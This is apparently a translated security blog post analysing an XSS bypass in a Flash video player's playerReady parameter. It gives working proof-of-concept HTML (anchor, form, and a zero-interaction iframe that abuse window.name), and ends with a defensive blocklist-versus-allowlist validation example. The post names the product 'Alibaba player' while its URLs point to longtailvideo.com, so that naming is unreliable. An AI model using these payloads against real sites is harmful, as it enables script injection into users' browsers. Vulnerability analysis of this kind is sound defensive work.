Alibaba PLAYER 5 latest swf XSS 0day analysis and POC improvement


Special thanks to Thx for the idea :)

On the 16th, a foreign researcher published an unpatched XSS 0-day in Alibaba player. This player is the most widely used Flash player in the world, especially on many foreign adult video websites. Before this, Alibaba player had already had an XSS vulnerability with a wide impact.

According to the researcher's description, the problem arises because the previous XSS vulnerability was not fully fixed, so it can be bypassed and reused. The original problem was that the value of the playerReady parameter was not filtered at all and was passed straight into ExternalInterface.call, so arbitrary JS code could be executed. After two official minor-version patches, the final fix was to forbid the characters {} and () in the playerReady value. This simple fix can be bypassed.

POC in the original article:


Example 1:

This example simply uses javascript:alert(1) as the value of window.name.


<a target="javascript:alert(1)" href="http://player.longtailvideo.com/player.swf?playerReady=document.location=window.name%2b%27//%27%2b">Click Me</a>


Two features are used here: the frame-name form of the a tag's target attribute, and the fact that window.name survives cross-domain navigation. Of the values the target attribute accepts, we normally only use the four reserved ones: _blank, _parent, _self and _top; a frame name is rarely used. A frame name designates a named window, and the document is loaded into that window for processing, so the frame name is exactly that window's window.name. This POC uses the javascript:alert(1) pseudo-protocol as the frame name in the a tag, and the vulnerable URL sets location to window.name, which executes our JS code. We can also build the POC with form and other tags that support the target attribute:
<form action="http://player.longtailvideo.com/player.swf?playerReady=document.location=window.name%2b%27//%27%2b" method="post" target="javascript:alert(1)">
<button type="submit">Logon</button>
</form>

However, this POC requires user interaction, which is awkward. We can actually improve it into a form that needs no interaction at all. Since the frame name is simply the name of the window, we can use an iframe directly and set its name to javascript:alert(1).

<iframe name="javascript:alert(document.domain)" src="http://player.longtailvideo.com/player.swf?playerReady=document.location=window.name%2b%27//%27%2b"></iframe>


That way our POC is triggered automatically :)
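To make the point about the patch concrete, here is an added example (my own code, not from the original post or from the player's source): it pulls the playerReady value out of the POC URL above, runs it through a check that mimics the post's description of the vendor fix (reject the value only if it contains {} or ()), and compares that with an allowlist that accepts nothing but a dotted JavaScript callback name, which is all ExternalInterface.call needs. The function names and the allowlist regex are my assumptions.

```javascript
// Added example: blocklist vs. allowlist validation of the playerReady parameter.
// The POC URL and the forbidden characters come from the post; everything else is assumed.

// Vendor-style fix as the post describes it: reject only if {, }, ( or ) is present.
function blocklistAccepts(playerReady) {
  return !/[{}()]/.test(playerReady);
}

// Defender-side allowlist: the parameter is only ever used as the name of a JS function
// to call back, so a dotted identifier (e.g. "myPlayer.onReady") is the only shape needed.
const CALLBACK_NAME = /^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$/;
function allowlistAccepts(playerReady) {
  return CALLBACK_NAME.test(playerReady);
}

// Decode the playerReady value from a player URL exactly as a query parser would
// (%2b -> '+', %27 -> "'"); returns null when the parameter is absent.
function extractPlayerReady(url) {
  return new URL(url).searchParams.get("playerReady");
}

// Run both checks on one value so the difference is visible side by side.
function compare(playerReady) {
  return {
    value: playerReady,
    blocklist: blocklistAccepts(playerReady),
    allowlist: allowlistAccepts(playerReady),
  };
}

// The POC URL from the post (constructed input for this example).
const POC_URL =
  "http://player.longtailvideo.com/player.swf?playerReady=document.location=window.name%2b%27//%27%2b";

// The bypass value contains no braces or parentheses, so the blocklist passes it,
// while the allowlist rejects it because '=', '+', "'" and '/' are not identifier characters.
console.log(compare(extractPlayerReady(POC_URL)));
// A legitimate callback name passes both checks.
console.log(compare("myPlayer.onReady"));
// The originally reported payload shape is caught by both.
console.log(compare("alert(1)"));
```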

